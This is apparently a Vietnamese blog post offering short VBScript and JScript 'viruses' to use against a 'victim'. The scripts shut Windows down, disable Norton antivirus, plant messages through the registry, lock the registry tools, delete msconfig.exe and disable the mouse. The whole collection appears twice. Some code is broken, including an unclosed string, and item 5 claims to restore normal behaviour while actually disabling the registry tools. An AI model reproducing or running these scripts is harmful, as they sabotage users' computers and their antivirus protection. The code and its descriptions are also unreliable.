Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi:
Dưới đây là code của một số con virus nhỏ dưới dạng VBS:
1.Không cho victim khởi động máy:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
2. Disable NAV:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
3. Hiển thị một message mỗi khi reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la TrungWK- Toi den tu Chip&Kitty.tk"
4. Hiển thị một dòng lệnh khi click vào file hay folder:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk\","Robinhood"
5. Làm cho các trò trên hoạt động bình thường:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Dưới dạng Javascipt :
var wsh;
wsh=new ActiveXObject ("Wscript.shell");
// Winlogon when reboot
var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com") ;
//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;
//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");
//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");
Dưới đây là code của một số con virus nhỏ dưới dạng VBS:
1.Không cho victim khởi động máy:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
2. Disable NAV:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
3. Hiển thị một message mỗi khi reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la TrungWK- Toi den tu Chip&Kitty.tk"
4. Hiển thị một dòng lệnh khi click vào file hay folder:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk\","Robinhood"
5. Làm cho các trò trên hoạt động bình thường:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Dưới dạng Javascipt :
var wsh;
wsh=new ActiveXObject ("Wscript.shell");
// Winlogon when reboot
var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com") ;
//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;
//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");
//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");
0 nhận xét:
Đăng nhận xét